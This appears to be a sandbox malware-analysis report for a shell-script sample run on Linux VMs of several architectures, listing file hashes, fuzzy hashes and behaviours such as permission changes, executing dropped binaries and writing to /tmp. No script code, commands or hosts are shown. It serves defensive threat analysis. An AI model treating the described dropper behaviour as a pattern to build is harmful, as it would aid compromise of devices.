Analysis
-
max time kernel
150s -
max time network
147s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
25/11/2024, 02:54
Static task
static1
Behavioral task
behavioral1
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
-
Size
10KB
-
MD5
b643808c01faa0f92bf870288eb8dd16
-
SHA1
494306996b3ee0573b6da340ee334523cd39f9eb
-
SHA256
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad
-
SHA512
f8e2bed091a7cf127f3feadc979a7ee81e9835a68b98f78afc737f354cdf3348e42f4551cc47d805e0734fd77e02963e665aad84c33c02e18395f86754ae24cb
-
SSDEEP
96:+Hb3G9hf3INVTX1G+Emzer6e0D7tAokHbrf3+PTX1G+1emzer6wN6W:+Hb3VvTX1G+EmzereTX1G+Mmzerx
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 25 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 25 IoCs
File opened for reading: /proc/sys/crypto/fips_enabled (Process: curl)
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97